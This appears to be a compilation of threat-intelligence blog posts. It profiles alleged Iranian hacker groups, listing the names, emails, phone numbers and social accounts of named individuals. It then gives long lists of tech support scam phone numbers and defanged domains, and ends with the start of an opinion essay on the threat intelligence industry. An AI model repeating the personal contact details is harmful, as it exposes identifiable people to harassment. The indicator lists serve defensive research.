Nitrojen26, Mehdy007, MagicCoder, tHe.Mo3tafA, Plus, BodyGuard

Sample Network Infrastructure Reconnissance:

hxxp://sun-army.org - 185.53.179.10 - Email: Sun.Army@asia.com; Lord.private@ymail.com

Name: Omid Ghaffarinia

Handle: Plus

Email: omid.ghaffarinia@gmail.com; plus.ashiyane@gmail.com; omid.ghaffarinia@alum.sharif.edu

Phone: 091 2444 9002

Web

Site:

http://alum.sharif.ir/

omid.ghaffarinia/;

http://alum.sharif.ir/

omid.ghaffarinia/;

http://omidplus.persiangig.com/;

Social

Media

Accounts:

https://plus.google.com/109226633947780718251;

https:/

/plus.googl-

e.com/109226633947780718251

Personal Photos of Omid Ghaffarinia a.k.a Plus:
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Sample Personal Photos from a Train Trip:
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Handle: MagicCoder

Email: MagicC0d3r@gmail.com

Web Site: http://magiccoder.ir

Handle: Mehdy007

Email: mehdy007@hotmail.fr

Web Site: http://mehdy007.persiangig.com

Sample Sun Army Cover Art Photos:
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ITSec Team a.k.a Amn pardazesh kharazmi a.k.a Pooya Digital Security Group Members:

Pejvak, M3hr@n.S, Am!rkh@n, Doosib, H4mid@Tm3l, R3dm0ve, Provider, ahmadbady
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Sample Team Member Personally Identifiable Information:

Name: Amin Shokohi

Handle: Pejvak

Email: pejv4k@yahoo.com

Web Site: http://pejv4k.persiangig.com; http://pejv4k.110mb.com

Handle: Mehr@n.S

Email: M3hran.S@gmail.com

Sample Network Infrastructure Reconnaissance:

http://itsecteam.com/

Social Network Graph of Sun Army Team Members including ITSec Team Members and the Mersad Co. company:
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Name: Mohammad Sagegh Ahmadzadegan

Handle: Nitrojen26

Email: nitr0jen26@asia.com; Nitrojen26@yahoo.com; me@sadahm.n et

Web Site: hxxp://sadahm.com

Social Media Accounts: https://twitter.com/nitrojen26

Sample Personal Photos of Mohammad Sagegh Ahmadzadegan a.k.a Nitrojen26:
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Sample Mersad Co. Company Logo:

Sample Network Infrastructure reconnaissance:
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hxxp://mersad.co/ - 188.40.112.196

hxxp://mersadco.ir

Mohammad’s life has strongly tied with programming. After graduation of Computer Engineering, he studied IT

(E-Commerce) for his Master to know more about the relation of business and technology. You can find some large

scale software projects managed by him like Iran’s SOC, SDIDS, Jolfa Vulnerability DB and etc. Now he is a university

lecturer and also CEO of Mersad Co. and one of TKJ Co. consultants. Mohammad is here to help you how to manage

a good develop team and guide you to have better usage of technology to achieve your business goals.

Personal Photos of Mersad Co.CEO Mohammad Hamidi Esfahani:
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Personally Identifiable Information regarding Mersad Co. Company CEO Mohammad Hamidi Esfahani:

Name: Mohammad Hamidi Esfahani

Email:’m.hamidi.es@gmail.com

Phone: 0913-304-7591

Web Sites: http://www.mohammadhamidi.ir/
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Social Media Accounts: https://www.facebook.com/mohammad.hamidi; https://twit ter.com/haj _mamed;

https://github.com/mohammadhamidi; https://medium.com/@haj _mamed; https://medium.com/@haj _mamed;

https://plus.google.com/+mohammad hamidiEsfahani;

Sample Mersad Co. Personal Company Photos:
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Stay tuned!

1. https://ddanchev.blogspot.com/2015/07/assessing-computer-network-operation_29.html

2. https://www.fbi.gov/wanted/cyber

3. https://www.fbi.gov/wanted/cyber/ahmad-fathi

4. https://www.fbi.gov/wanted/cyber/hamid-firoozi

5. https://www.fbi.gov/wanted/cyber/amin-shokohi

6. https://www.fbi.gov/wanted/cyber/mohammad-sadegh-ahmadzadegan
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7. https://www.fbi.gov/wanted/cyber/omid-ghaffarinia

8. https://www.fbi.gov/wanted/cyber/sina-keissar

9. https://www.fbi.gov/wanted/cyber/nader-saedi
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Historical OSINT - A Portfolio of Fake Tech Support Scam Domains - An Analysis (2019-01-16 16:03)

The Rise of Tech Support Scams? You wish.

The general availability of Tech Support Scams can be attributed to an overall increase in the standardization

of social engineering type of fraudulent and rogue scams which can be greatly attributed to the overall availability of

affiliate-network type of fraudulent revenue-sharing schemes.

Keep reading.

What can be best described as today’s modern Tech Support Scam can be best described as a logical copycat evolution

between the well-known Scareware also known as Fake Security Software fraudulent and malicious monetization

scheme largely affecting millions of users globally thanks to the overall availability of affiliate-network type of

revenue-sharing schemes.
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Among the key distribution and propagation tactics including spam and phishing campaigns including instant

messaging and black hat SEO largely relying on traffic acquisition on volume-basis for the purpose of converting the

traffic to potential fraudulent customers and victims.

Taking into consideration that the key traffic acquisition tactics remain the primary growth factor of the Tech

Support Scam market segment among the key business model and "talent acquisition" tactics remain the actively

outsourcing to custom-labeled call-centers and data mining operators including the active utilization of brand-jacking

including possible typosquatting-based type of campaigns including active visual-social engineering type of cam-

paigns.

Are Tech Support Scams making a come-back? How can we best proceed to estimate the true cost and associ-

ated actionable threat intelligence courtesy of Tech Support Scams. Keep reading!

In this Intelligence brief I’ll provide actionable intelligence on a diverse portfolio of Fake Tech Support scam domains

and discuss in-depth the tactics techniques and procedures of the cybercriminals behind it with the idea to success-

fully disrupt and shut down the operations of the rogue operations related to this particular Intelligence brief.

Sample portfolio of fake and fraudulent Tech-Support Scam phone numbers:

1-855-525-4632

1-855-482-6468

1-866-537-7060

1-888-714-0027

1-877-895-8043

1-844-257-9397

1-844-815-5553

1-844-307-2991

1-877-354-9880
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1-877-489-7626

1-844-211-3940

1-888-496-4248

1-844-500-1353

1-855-998-5040

1-888-264-6545

1-844-307-3791

1-888-691-4990

1-888-484-4958

1-844-850-3561

1-877-253-8089

1-844-824-9930

1-844-413-7017

1-888-941-3234

1-888-683-4880

1-800-450-1910

1-844-305-2498

1-866-285-0655

1-800-777-0770

1-877-554-1924

1-877-910-7192

1-877-777-2804

1-844-548-6474

1-877-581-8998

1-844-307-6883

1-855-639-4698

1-888-223-4112
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1-888-547-4914

1-844-307-2994

1-888-395-6629

1-866-389-3575

1-844-856-1333

1-800-964-8718

1-800-898-6987

1-844-822-0875

1-888-607-7011

1-877-759-9789

1-844-313-6004

1-844-851-4610

1-844-324-6281

1-844-860-1112

1-844-870-5033

1-855-661-6640

1-800-051-3725

1-844-347-0741

1-877-227-0785

1-833-224-8222

1-833-248-4555

1-833-300-5666

1-833-334-8999

1-833-335-1333

1-833-336-8633

1-833-337-6555

1-833-339-7733

1-833-414-5500

1-833-414-8800

1-833-432-7770

1-833-543-8896

1-833-706-4400

1-833-706-8800

1-833-776-8324

1-833-783-7700

1-833-802-2200

1-833-863-6600

1-833-870-9054

1-833-870-9055

1-833-995-1999

1-844-200-1625

1-844-200-1653

1-844-200-1712

1-844-200-1713

1-844-200-1716

1-844-200-1751

1-844-200-1859

1-844-200-1890

1-844-200-2560

1-844-200-2574
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1-844-200-2578

1-844-200-2629

1-844-200-2650

1-844-200-2870

1-844-200-4091

1-844-200-4098

1-844-200-4099

1-844-200-4116

1-844-200-4203

1-844-200-4243

1-844-200-4246

1-844-200-4249

1-844-200-4323

1-844-200-4379

1-844-200-4473

1-844-200-4474

1-844-200-4485

1-844-200-4486

1-844-204-9149

1-844-212-8344

1-844-229-6999

1-844-237-2411

1-844-238-9924

1-844-241-5999

1-844-241-7912

1-844-248-2909

1-844-252-6111

1-844-284-8623

1-844-305-5027
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1-844-307-1915

1-844-313-2994

1-844-313-6006

1-844-313-9175

1-844-318-9400

1-844-326-3137

1-844-350-4289

1-844-352-9401

1-844-366-5999

1-844-370-2707

1-844-371-8869

1-844-378-6561

1-844-378-6777

1-844-378-6888

1-844-400-9542

1-844-411-4922

1-844-422-5281

1-844-428-3630

1-844-470-9939

1-844-489-6111

1-844-539-5778

1-844-539-5784

1-844-542-4107

1-844-554-2336

1-844-556-2898

1-844-556-7758

1-844-558-1757

1-844-573-4082

1-844-577-2888

1-844-594-0202

1-844-613-8256

1-844-622-9881

1-844-651-2555

1-844-653-8666

1-844-656-1695

1-844-662-9666

1-844-665-6888

1-844-675-2565

1-844-675-8730

1-844-693-9511
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1-844-712-8372

1-844-715-0111

1-844-719-6166

1-844-724-6592

1-844-730-7111

1-844-743-6449

1-844-750-6258

1-844-755-0510

1-844-775-6410

1-844-775-8407

1-844-792-2887

1-844-800-6856

1-844-801-5941

1-844-805-0111

1-844-807-4555

1-844-811-1823

1-844-816-7270

1-844-843-5125

1-844-855-9343

1-844-858-5647

1-844-872-1286

1-844-873-1596

1-844-885-1444

1-844-891-1947

1-844-891-4879

1-844-895-3281

1-845-205-9081

1-845-233-6465

1-850-583-3302

1-855-203-6745

1-855-205-4077

1-855-269-5777

1-855-278-5777

314

1-855-287-5222

1-855-297-8444

1-855-302-8333

1-855-307-6690

1-855-307-6697

1-855-325-1775

1-855-336-7111

1-855-372-4111

1-855-374-9888

1-855-382-4333

1-855-389-2999

1-855-389-4333

1-855-390-1666

1-855-393-4537

1-855-400-5988

1-855-428-2297

1-855-433-5111

1-855-441-7442

1-855-441-7646

1-855-442-4430

1-855-490-1999

1-855-490-3222

1-855-501-3222

1-855-534-8622

1-855-558-6111

1-855-633-1666

1-855-676-6410

1-855-687-6111

1-855-697-5333

1-855-718-9786

1-855-755-0999

1-855-844-8599

1-855-937-4376

1-855-955-2511

1-866-202-1086

1-866-215-1667

1-866-217-8834

1-866-217-8835

1-866-218-3112

1-866-218-3116

1-866-249-7329

1-866-279-9569

1-866-281-2116

1-866-338-7786

1-866-343-8297

1-866-389-1479

1-866-450-3079

1-866-497-4002

1-866-511-7594

1-866-625-5558
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1-866-626-3808

1-866-664-7164

1-866-841-9124

1-866-847-7743

1-877-211-2480

1-877-217-5947

1-877-219-1029

1-877-219-1485

1-877-219-1996

1-877-219-5966

1-877-220-5017

1-877-220-6098

1-877-220-8783

1-877-220-9321

1-877-220-9962

1-877-221-1366

1-877-221-8289

1-877-224-2895

1-877-244-0727

1-877-264-2122

1-877-268-9059

1-877-268-9059-

1-877-293-4440

1-877-393-8186

1-877-396-6777

1-877-433-3061

1-877-469-2140

1-877-503-7614

1-877-509-8343

1-877-510-5544

1-877-691-3469

1-877-750-7842

1-877-818-5969

1-877-824-9312

1-877-843-3339

1-877-863-4795

1-888-202-8995

1-888-206-1755

1-888-209-7130

1-888-210-0673

1-888-210-9250

1-888-223-4021

1-888-223-7642
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1-888-228-4154

1-888-228-9998

1-888-231-1966

1-888-232-2902

1-888-243-9401

1-888-244-4119

1-888-244-4578

1-888-244-5014

1-888-244-6132

1-888-258-6033

1-888-258-9055

1-888-267-7999

1-888-279-3119

1-888-287-0989

1-888-300-4330

1-888-302-0646

1-888-308-4972

1-888-308-4985

1-888-309-7042

1-888-316-5842

1-888-316-7391

1-888-316-8777

1-888-325-1924

1-888-331-3064

1-888-335-7633

1-888-346-4666

1-888-351-9666

1-888-372-9389

1-888-384-3226

1-888-403-6867
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1-888-412-7333

1-888-423-3886

1-888-440-3005

1-888-450-3444

1-888-501-9477

1-888-505-6572

1-888-521-0529

1-888-526-7488

1-888-530-7555

1-888-545-9220

1-888-552-5210

1-888-554-6480

1-888-554-8205

1-888-554-8266

1-888-558-2612

1-888-589-7758

1-888-598-7976

1-888-621-0834

1-888-651-5889

1-888-652-1304

1-888-696-0666

1-888-728-7333

1-888-728-9143

1-888-799-0599

1-888-801-0627

1-888-801-5424

1-888-802-2529

1-888-802-7120
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1-888-804-5441

1-888-839-9985

1-888-843-1126

1-888-858-8356

1-888-870-3813

1-888-876-4011

1-888-879-9789

1-888-881-9364

1-888-883-9798

1-888-884-4139

1-888-884-6349

1-888-885-1701

1-888-885-4967

1-888-885-8695

1-888-886-9457

1-888-887-8691

1-888-917-5333

1-888-944-6229

1-888-965-8445

1-925-526-4637

319

Sample portfolio of Fake Tech Support Scam Domains:

hxxp://0120-hfjkahgfu-238.cf

hxxp://1-800-my-apple.org

hxxp://1serversupport.com

hxxp://2serversupport.com

hxxp://3serversupport.com

hxxp://3stepremoval.com

hxxp://4serversupport.com

hxxp://5serversupport.com

hxxp://6serversupport.com

hxxp://7serversupport.com

hxxp://8serversupport.com

hxxp://9inchmonster.us

hxxp://9serversupport.com

hxxp://11serversupport.com

hxxp://22serversupport.com

hxxp://24-7helpline.co.uk

hxxp://24hour-apple-support.org

hxxp://24techhelp.com

hxxp://24x7livesolution.com

hxxp://33host.net

hxxp://33serversupport.com

hxxp://44serversupport.com

hxxp://55serversupport.com

hxxp://66serversupport.com

hxxp://77serversupport.com

hxxp://85dffas614fas.xyz

hxxp://88serversupport.com

hxxp://99printerservice.net

hxxp://99serversupport.com

hxxp://99techsolutions.com

hxxp://111installsecuritysupport.info

hxxp://111onlineerrorreport.info

hxxp://111serversupport.com

hxxp://111websecurity.info

hxxp://222installsecuritysupport.info

hxxp://222onlineerrorreport.info

hxxp://222serversupport.com

hxxp://222websecurity.info

hxxp://247fasttechsupport.com

hxxp://247helpnumber.com

hxxp://247officecom-setup.us

hxxp://247support-number.com

hxxp://247support.co

hxxp://247troubleshooting.club

hxxp://333installsecuritysupport.info

hxxp://333onlineerrorreport.info

hxxp://333serversupport.com

hxxp://333websecurity.info

hxxp://360numberfinder.com
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hxxp://360securityguard.com

hxxp://360securityhelp.com

hxxp://360techservice.net

hxxp://444installsecuritysupport.info

hxxp://444onlineerrorreport.info

hxxp://444serversupport.com

hxxp://444websecurity.info

hxxp://555installsecuritysupport.info

hxxp://555onlineerrorreport.info

hxxp://555serversupport.com

hxxp://555websecurity.info

hxxp://666installsecuritysupport.info

hxxp://666onlineerrorreport.info

hxxp://666serversupport.com

hxxp://777installsecuritysupport.info

hxxp://777onlineerrorreport.info

hxxp://777serversupport.com

hxxp://800pchelp.com

hxxp://800support.net

hxxp://888installsecuritysupport.info

hxxp://888onlineerrorreport.info

hxxp://888serversupport.com

hxxp://999installsecuritysupport.info

hxxp://999onlineerrorreport.info

hxxp://999serversupport.com

hxxp://1117b.com

hxxp://1214now.xyz
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hxxp://1777harddriveatrisk.com

hxxp://1800customercare.com

hxxp://1800customerservicephonenumber.com

hxxp://2709redirect.us

hxxp://2777harddriveatrisk.com

hxxp://3777harddriveatrisk.com

hxxp://4777harddriveatrisk.com

hxxp://5777harddriveatrisk.com

hxxp://6112-webtechpro.xyz

hxxp://6777harddriveatrisk.com

hxxp://7777harddriveatrisk.com

hxxp://8777harddriveatrisk.com

hxxp://9777harddriveatrisk.com

hxxp://19216801admin.com

hxxp://19216801login.com

hxxp://19216811admin.com

hxxp://19216811login.com

hxxp://8885162007.com

hxxp://18005633020.com

hxxp://1397659756922323.hatenablog.com

hxxp://a-mcafee.com

hxxp://aakasupport.com

hxxp://aaxiominfotech.com

hxxp://aaxiomtech.com

hxxp://aaxiomtechnology.com

hxxp://ab5-frozen-virus.xyz

hxxp://aberonapps.com

hxxp://absolutesoftech.org

hxxp://absolutesoftechltd.com

hxxp://accessremoved293.com

hxxp://account4sure.com

hxxp://account-recovery.uk

hxxp://accountmicrosoft.com

hxxp://accountsmicrosoft.com

hxxp://accuratehelpline.com

hxxp://accurateresolutionservices.com

hxxp://accuratesupporthelpline.net

hxxp://acenger.com

hxxp://acer-laptops-support.com

hxxp://acer-phone-number.com

hxxp://acer-support-australia.com

hxxp://acer-support-uk.com

hxxp://acer-support-us.com

hxxp://acer-support.org.uk

hxxp://acer-support.uk

hxxp://acer.repair-centre.ca

hxxp://acer.support

hxxp://acer.supportnewzealand.co.nz

hxxp://acer.supportnumberaustralia.com

hxxp://acer.technical-care.com
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hxxp://acersupport.ca

hxxp://acersupport.co.uk

hxxp://acersupport.org

hxxp://acersupportphonenumber.com

hxxp://achkomachkogaveriri.xyz

hxxp://aclitechsolutions.com

hxxp://activate-com.org

hxxp://activate-mcafee.net

hxxp://activate-norton-setup.com

hxxp://activate-setup.com

hxxp://activate.space

hxxp://activateantivirus.com

hxxp://activatelinkcode.com

hxxp://activatesetup-key.online

hxxp://activatewindows.xyz

hxxp://activationeset.com

hxxp://activationproductkey.com

hxxp://addressofcustomerservicenumber.com

hxxp://administrator-free-customer-service9x-call-1866-285-0655.info

hxxp://administrator-free-support-customer-service3x-call.com

hxxp://adobe001.use.com

hxxp://adobe-phonesupport.com

hxxp://adobe-tech-support.com

hxxp://adobe.supportnumberaustralia.com.au

hxxp://adobe.supportnumbernz.co.nz

hxxp://adobe.technicalsupportservicesinc.com

hxxp://adobephotoshopsupport.com

hxxp://adobephotoshopsupport.flavors.me

hxxp://adobesupporthelp.com

hxxp://adobesupportnumber.co.uk
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hxxp://adobesupportnumber.com

hxxp://advseo2016.tumblr.com

hxxp://adytechnumber.com

hxxp://aextrolgy-srunconly.xyz

hxxp://agatechexperts.com

hxxp://agilerecovery.com

hxxp://agiletechbusiness.com

hxxp://agiletechnicalsoftwaresolutions.com

hxxp://akashbhandari.com

hxxp://alacrity-technologies.com

hxxp://alarm-0grap9.stream

hxxp://alarm-0hung9.stream

hxxp://alarm-2friv6.stream

hxxp://alarm-nc89.stream

hxxp://alert-1trhn1.stream

hxxp://alert-engine.com

hxxp://alert-malware-found-system-not-secured-call-support.info

hxxp://alert-result-102.com

hxxp://alert-windows-not-genuine-data-compromised-plese-call-support.us

hxxp://alert-your.system-has.detected-infection.system-warning.software-support .in

hxxp://alertcomeinpc.online

hxxp://alertcomputersysteminterruptunsecure.club

hxxp://alertinpc.website

hxxp://alertinsystem.website

hxxp://alertonpc.space

hxxp://alertonpc.website

hxxp://alertops.xyz

hxxp://alerttechhelp.com

hxxp://allcopro.com

hxxp://allemailtechsupport.freshdesk.com

hxxp://allforpcsecurity.com

hxxp://allpcsupport.org

hxxp://allprintersupports.online

hxxp://allsupport.online

hxxp://allsupportno.com

hxxp://allsupportnumber.com

hxxp://alphageekwebsolutions.com

hxxp://alwaystrackaffliate.online

hxxp://amantech.biz

hxxp://amazonprimehelpdesk.com

hxxp://ambrosiaservicesllc.us

hxxp://american-trans.us

hxxp://americaonlinesupportnumber.olanola.com

hxxp://amessage.xyz

hxxp://andrew-stross.blogmasters.ru

hxxp://andriod.porovid.com

hxxp://anpuhelp.com

hxxp://anrweblounge.com

hxxp://anti-spyware-101.com

hxxp://anti-viruss.com
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hxxp://anti-virussupport.co.uk

hxxp://antivirus-customerservice.com

hxxp://antivirus-help.co.uk

hxxp://antivirus-help.org

hxxp://antivirus-helpline-number.org

hxxp://antivirus-helpnumber.com

hxxp://antivirus-hub.net

hxxp://antivirus-number.com

hxxp://antivirus-support-number.com

hxxp://antivirus-support-number.net

hxxp://antivirus-support-number.online

hxxp://antivirus-support-number.org

hxxp://antivirus-support.net

hxxp://antivirus-supportnumber.com

hxxp://antivirus-technical-support.com

hxxp://antivirus-technicalsupport.com

hxxp://antivirusconsulting.com

hxxp://antiviruscontactnumber.co.uk

hxxp://antiviruscure.us

hxxp://antiviruscustomerservices.com

hxxp://antivirusdaddy.com

hxxp://antiviruserror.com

hxxp://antivirushelpdesk.in

hxxp://antivirushelpdesknumber.co.uk

hxxp://antivirushelpnumber.co.uk

hxxp://antivirusinfotech.us

hxxp://antivirusinstallation.co.uk

hxxp://antivirusnumber.com

hxxp://antivirusphonenumber.co.uk
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hxxp://antivirussecurities.com

hxxp://antivirussetuphelp.com

hxxp://antivirussuport.com

hxxp://antivirussupport-au.puzl.com

hxxp://antivirussupport.ca

hxxp://antivirussupportaustralia.com

hxxp://antivirussupportaustralia.com.au

hxxp://antivirussupportcanada.ca

hxxp://antivirussupporthelpdesk.com

hxxp://antivirussupporthelpline.com

hxxp://antivirussupportnumber.us

hxxp://antivirussupportnumberca.ca

hxxp://antivirussupportnumberca.com

hxxp://antivirussupportnumberusa.com

hxxp://antivirussupportphonenumber.co.uk

hxxp://antivirussupports.net

hxxp://antivirustechhelp.com

hxxp://antivirustechnicalhelp.com

hxxp://antivirustechnicalservice.com

hxxp://antivirustechsupport.com

hxxp://antivirustechsupportnumber.com

hxxp://antivirusupportnumber.com

hxxp://anvsupport.com

hxxp://aol-online-support.com

hxxp://aolcustomercare.xyz

hxxp://aolcustomercarecontactnumber.xyz

hxxp://aolcustomercarenumber.xyz

hxxp://aolcustomerservice.co

hxxp://aolcustomerservice.net

hxxp://aolcustomersupport.page.tl

hxxp://aoldesktopgold.quora.com

hxxp://aolemailpasswordforget.xyz

hxxp://aolemailpasswordrecovery.xyz

hxxp://aolemailsupport.xyz

hxxp://aolemailsupportcontactnumber.xyz

hxxp://aolemailtechnicalsupportnumber.xyz

hxxp://aolgoldsupport.com

hxxp://aolmailsupports.com

hxxp://aolsupport.email

hxxp://aolsupport.xyz

hxxp://aoltechnicalhelp.com

hxxp://aoltechnicalsupport.xyz

hxxp://aoltechnicalsupportcontactnumber.xyz

hxxp://aoltechsupportnumber.com

hxxp://apexseo.online

hxxp://apextm.com

hxxp://apple-24hour-support.org

hxxp://apple-800-number.org
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hxxp://apple-anti-virus.org
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hxxp://webgeekx.com

hxxp://webguru.site

hxxp://webhelpcenter24x7.com

hxxp://webhubunisol.com

hxxp://webinnovator.net

hxxp://webmail-login.online

hxxp://webmailhelps.com

hxxp://webmakerlink.com

hxxp://webnetworksolutions.com

hxxp://webninza.com

hxxp://webpcsfix.com

hxxp://webroot-com-safe.us

hxxp://webroot-install.com

hxxp://webroot-phone-number.com

hxxp://webroot.klantenservicenummernederland.com

hxxp://webroot.support

hxxp://webroot.technicalhelpdesknumber.com

hxxp://webrootcomsafe.services

hxxp://webrootcustomerservice.com

hxxp://webrootofficial.com

hxxp://webrootsupportphone.com

hxxp://webroottechsupport.com

hxxp://webserviceassist.online

hxxp://webservicehelp.website

hxxp://websoftdesk.com

hxxp://webxsolution.co.uk
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hxxp://weguardcomputers.com

hxxp://wemotechsupport.com

hxxp://wesupportsolutions.com

hxxp://wgmkr.xyz

hxxp://whatsapp-support-us.com

hxxp://wiebisdeinstallieren.com

hxxp://wiemanmalwaredeinstallieren.org

hxxp://wieumentfernenvirus.com

hxxp://wikihelpco.wordpress.com

hxxp://win-secure-online-assistance-error.info

hxxp://winbytes.org

hxxp://winchatsupport.com

hxxp://window8-free-help-customer-service-call-1877-581-8998.site

hxxp://window-download-faliure-support-ppit6990.com

hxxp://window-sup.blogspot.com

hxxp://window-support.co.uk

hxxp://windownotification.com

hxxp://windows10customerservice.com

hxxp://windows10help.support

hxxp://windows10helpdesk.com

hxxp://windows10problems.org

hxxp://windows10supportcenter.com

hxxp://windows10supportpage.com

hxxp://windows10supportphonenumber.com

hxxp://windows10techsupportphonenumber.com

hxxp://windows-8.technicalsupportservicesinc.com

hxxp://windows-10.technicalsupportservicesinc.com

hxxp://windows-10support.com

hxxp://windows–alert.online

hxxp://windows–alerts.online

hxxp://windows-blue-screen-crash.xyz

hxxp://windows-bug.site

hxxp://windows-corrupted-browser-not-secure-call-support.info

hxxp://windows-error.co

hxxp://windows-errorx.com

hxxp://windows-firewall-security-alert-error-found5.info

hxxp://windows-has-detected-some-suspicious-activity-from-your-ipqw.in

hxxp://windows-has-detected-some-suspicious-activity-fromyourcomputer.com
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hxxp://windows-helplines.com

hxxp://windows-kernal-warning-error-found-diskread-error.com

hxxp://windows-security-alert-malware-found-call-support.info

hxxp://windows-security-alert-system-not-safe-call-support.info

hxxp://windows-security-alert-system-not-safe-plese-call-support.info

hxxp://windows-security-alert-virus-found-call-support.info

hxxp://windows-security-center-2236.info

hxxp://windows-server-error.info

hxxp://windows-server-warning.info

hxxp://windows-server-warning.us

hxxp://windows-support-me.com

hxxp://windows-support.windowshelp.support

hxxp://windows-system-587632.us

hxxp://windows-system-alert.info

hxxp://windows-system-error.us

hxxp://windows-technical-support.com

hxxp://windows-techsupport.com

hxxp://windows-threat.com

hxxp://windows-virus-alert-risk.online

hxxp://windows-warning-error-found.com

hxxp://windows.technical-care.com

hxxp://windowsalerts.xyz

hxxp://windowscanpage.online

hxxp://windowscanpage.website

hxxp://windowsecuritycounsel.online

hxxp://windowserrorhelps.com

hxxp://windowserrorsalert.com

hxxp://windowshelp.support

hxxp://windowsisnotgenuine.com

hxxp://windowslivemailcustomerservice.com

hxxp://windowslivemailsupport.net

hxxp://windowslivetechsupport.com

hxxp://windowsmicrosofts.xyz

408

hxxp://windowssecurity-center-2999.info

hxxp://windowsserver102082308328.xyz

hxxp://windowssupportnumbers.com

hxxp://windowssupportphonenumber.com

hxxp://windowstechnicalsupportnumbers.com

hxxp://windowstechsupportphonenumber.com

hxxp://windowsupport.ulcraft.com

hxxp://windowsupportaustralia.xyz

hxxp://windowsupporthelp247.com

hxxp://windowsvirusnotification.com

hxxp://windstream.supportno.com

hxxp://windsupportcare10.xyz

hxxp://winprotechnologies.com

hxxp://winsec.biz

hxxp://winsurftechnology.com

hxxp://wintechassist.com

hxxp://wizxpert.com

hxxp://wordfiction11.info

hxxp://worldwebhelper.com

hxxp://worldwidewebb.in

hxxp://wormsupport1.info

hxxp://wormsupport2.info

hxxp://wormsupport3.info

hxxp://wormsupport4.info

hxxp://wormsupport5.info

hxxp://wormsupport.info

hxxp://wormsupports.info

hxxp://wqeasfas.xyz

hxxp://wruxqo-atixin.xyz

hxxp://www-mcafee-com-activate.com

hxxp://www-norton-com-setup.com

hxxp://www-support.net

hxxp://wwwhelpnumber.co.uk

hxxp://wwwmcafeeactivate.com

hxxp://wwwmcafeecomactivate.co

hxxp://wwwoasisinfosolutionin.000webhostapp.com
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hxxp://wwwofficecomsetup.co

hxxp://wwwofficecomsetup.net

hxxp://wwwofficecomsetup.xyz

hxxp://x62y.com/8n9jd/index.php

hxxp://xboxhelpline.com

hxxp://xboxportforwarding.com

hxxp://xdebugging.club

hxxp://xerox.printersupportaustralia.com

hxxp://xerox.printersupportca.com

hxxp://xerox.printersupportnumbercanada.ca

hxxp://xientsupport.com

hxxp://xurnya-zlysifu.xyz

hxxp://yahoo-customer-care.co.uk

hxxp://yahoo-customer-service.org

hxxp://yahoo-customer-service.us

hxxp://yahoo-service-number.com

hxxp://yahoo-supports.com

hxxp://yahoo-yahoomail.com

hxxp://yahoo.australiaemailsupport.com

hxxp://yahoo.klantenservicenederland.nl

hxxp://yahoo.numberireland.com

hxxp://yahoo.supportau.com.au

hxxp://yahoo.supportaustralia.com.au

hxxp://yahoo.supportnumberaustralia.com.au

hxxp://yahoo.technicalsupportcontact.net

hxxp://yahoocontact.weebly.com

hxxp://yahoocontactnumber.co.uk

hxxp://yahoocustomercare.us

hxxp://yahoocustomerservice.co.uk

hxxp://yahoocustomerservice.org

hxxp://yahoocustomerservicephonenumber.us

hxxp://yahoocustomerservices.net

hxxp://yahooservice.online

hxxp://yahoosupporstaustralia.blogszino.com

hxxp://yahoosupport.blogszino.com
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hxxp://yahoosupport.customerhelpusa.com

hxxp://yahoosupportau.skyrock.com

hxxp://yahoosupportaustralia.com.au

hxxp://yahoosupportcenter.com

hxxp://yahoosupporthelp.com

hxxp://yahoosupportnumber.com.au

hxxp://yahoosupportnumberau.wordpress.com

hxxp://yahoosupporttech.com

hxxp://yahootechsupport.site.pro

hxxp://ydeveloper.com

hxxp://yippeetech.co.uk

hxxp://ymailcustomerservice.com

hxxp://yournetworkreports.xyz

hxxp://yourpcassistant.com

hxxp://yourtechbay.com

hxxp://youtubemail.info

hxxp://youworldtrips.online

hxxp://ysence.com

hxxp://ysupportnumber.com

hxxp://z2s-microsoft.info

hxxp://zakazeniepoprawa.com

hxxp://zeus-virus-caused-system-corruption-contact.info

hxxp://zeusalert-1.xyz

hxxp://zeusalert-2.xyz

hxxp://zeusalert-3.xyz

hxxp://zeusalert-4.xyz

hxxp://zeusalert-5.xyz

hxxp://zeusalert-6.xyz

hxxp://zeusalert-7.xyz

hxxp://zeusalert-9.xyz

hxxp://zeusalert-10.xyz

hxxp://zeusalert-11.xyz

hxxp://zeusalert-12.xyz

hxxp://zeusalert-13.xyz

hxxp://zeusalert-14.xyz

hxxp://zeusalert-15.xyz

hxxp://zeuswin21147.in

hxxp://znetworks.net

hxxp://zonealarmantivirussupport.com

hxxp://zumbalamsada.xyz

hxxp://zyngahelp.com

Stay tuned for the updated portfolio of Fake Tech Support Scams to be published anytime soon!
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The Threat Intelligence Market Segment - A Complete Mockery and IP Theft Compromise - An Open Letter

to the U.S Intelligence Community (2019-01-24 19:25)

I recently came across to the most recently published [1]DoD Cyberspace Strategy 2018 which greatly reminded me

of a variety of resources that I recently took a look at in terms of catching up with some of the latest cyber warfare

trends and scenarios. Do you want to be a cyber warrior? Do you want to "hunt down the bad guys"? Watch out -

Uncle Sam is there to spank the very bottom of your digital irrelevance. How come?

It appears that the U.S is re-claiming back the dominance over the "communication channel" using a variety

of real-life oriented cyber threats including referencing and citing security researchers and NGOs (Non-Profit

Organization) as potential threats. Takes you back - doesn’t it? If it’s going to be massive it better be good.

It’s been several years since I last posted a quality update following my [2]disappearance and possible kidnapping

attempt circa 2010. What really took place during that period of time? The rise of ransomware? The rise of Tech

Support Scams? Yet another botnet currently spreading In The Wild? A market-driven buzz-word generation?

Take that - ransomware is there to take care, hundreds of thousands of supposedly relevant IOCs (Indicators of

Compromise) TTPs (tactics techniques and procedures) discussed to the bottom of your PR-relevant online presence.

The Rise of the Threat Hunter job career opportunity basically empowering with you with the almighty skills to "track

down" and "shut down" the bad guys? You wish - Uncle Sam is always there to take care.

Let’s discuss the Threat Intelligence market segment and offer an in-depth discussion on its inner working in-

cluding a possible discussion on the Threat Intelligence market segment in today’s modern Intelligence Community

successfully realizing the consequences of what was once a proprietary network known as the Internet - today’s
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modern cyber warfare operational battlefield.

Many of my blog readers are familiar with my work throughout the years however what you might not be aware of

is the fact that throughout the 90’s I used to pioneer the position of Technical Collector in the context of processing

hundreds of malicious and user-friendly Trojan Horses also known as Remote Backdoors what would be later on

described as Remote Access Tools through my hacker enthusiast years as an independent contractor and novice

hacker working with the market-leading LockDownCorp anti-trojan horse software including leading to what would

be later on better described as the foundations of the Threat Intelligence market qualitative Technical Collection

including the very basics of the foundations of CYBERINT.

Let’s discuss in-depth the current state of the Threat Intelligence market segment including an in-depth discus-

sion on the Threat Intelligence market segment in the context of today’s modern U.S Intelligence Community.

